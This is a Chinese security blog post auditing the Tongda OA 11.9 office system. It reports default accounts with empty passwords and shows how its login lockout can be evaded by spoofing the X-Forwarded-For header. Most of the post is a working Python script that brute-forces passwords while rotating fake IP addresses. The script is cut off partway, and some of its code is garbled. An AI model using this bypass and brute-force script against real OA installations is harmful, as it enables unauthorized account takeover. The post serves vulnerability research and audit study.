您当前的位置: 首页 > 

合天网安实验室

暂无认证

  • 0浏览

    0关注

    748博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

某OA 审计小记

合天网安实验室 发布时间:2022-09-01 17:30:54 ,浏览量:0

通达oa 作为攻防演练中出场率较高的一套 OA 系统,决定先从历史漏洞开始挖掘分析,对通达oa 有一个初步的了解

通达oa 11.9 的下载地址 默认安装地址是 D:\MYOA 联网状态下会自动更新到通达 oa 11.10

安装成功后,登录界面如下 默认账号为 admin 对应密码为空

 e70073b686621500efbcb5dda40f9056.png

登录后我们看到其中还有一些默认账号 lijia wangyun wangde 均可利用空密码登录成功

 0c318627738d2bbddd5b0b1d7335c326.png

爆破密码

 正常输入账号名密码时,输入三次错误就会禁止10分钟

 5e029c2cbc2db46a5e0cda806c9ddcd4.png

 d5abfba153b1e9569f2b4c3b7726b114.png

 我们可以通过代码方面追究其原因

 webroot/inc/td_core.php

 004a194f97befba5d9b18dab6264c908.png

 $USER_IP 的值可以来自于 X-Forwarded-For

 写个 python 脚本用于爆破用户名密码

 941a3fd932c8e436bdc369458d249b4b.png

import requests
import sys
import re


def read_passwd(passwordfile):
    withopen(file = passwordfile, mode='r') as f:
        passwd = f.read().splitlines()
        return passwd 


def Intruder_password(url,username,passwd_list):
    success_str ="正在进入OA系统,请稍候..."
    a=b=c=d=0
    url = url +"/logincheck.php"
    for passwd in passwd_list:
        payload ="UNAME={}&PASSWORD={}&encode_type=1".format(username,passwd)
        headers = { "X-Forwarded-For": "{}.{}.{}.{}".format(a,b,c,d),"Content-Type": "application/x-www-form-urlencoded"}
        response = requests.request("POST", url, data=payload, headers=headers)
        if(re.search(success_str, response.text)):
            print("正确的账号名:{}密码:{}".format(username,passwd))
        else:
            print("错误密码:{}".format(passwd))
        d=d+1
        if(d ==255):
            c = c +1
            d =0
        if(c ==255):
            b = b +1
            c =0
        if(b ==255):
            a = a +1
            b =0




def main():
    iflen(sys.argv)             
关注
打赏
1665306545
查看更多评论
0.0425s